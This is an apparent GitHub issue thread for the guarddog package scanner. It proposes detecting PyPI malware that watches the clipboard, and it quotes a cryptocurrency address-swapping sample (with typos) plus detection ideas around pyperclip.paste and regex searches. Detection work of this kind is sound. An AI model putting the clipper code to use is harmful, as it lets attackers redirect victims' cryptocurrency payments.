### ISSUE TITLE
Detect malware searching for specific data in the clipboard

### ISSUE THREAD

**Issue by romain-dd** [DataDog/guarddog#231]
Definition: Malware can search specific data in the clipboard to collect them or modify them
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
Sample:
```python
def address_swap(self):
  try:
    clipboard_data = pyperclip.paste()
    if re.search('^[13][a-km-zA-HJ-NP-21-9]{25, 34}$', clipboard_data):
      if clipboard_data not in [self.address_btc, self.address_eth, self.address_xchain]:
        if self.address_btc != "none":
          pyperclip.copy(self.address_btc)
          pyperclip.paste()
    if re.search('^Ox[a-fA-FO-9](40)$', clipboard data) :
      pyperclip.copy(self.address_eth)
      pyperclip-paste()

```

**Comment by christophetd** [comment]
Sounds good! Probably matching on `pyperclip.paste()` is already enough... PyPI packages accessing the clipboard probably make sense to investigate

**Comment by romain-dd** [comment]
Yep I agree. In case `pyperclip.paste()` is used by several legit PyPI packages, we can match on `pyperclip.paste()` followed by `re.search` or other similar functions that search for data
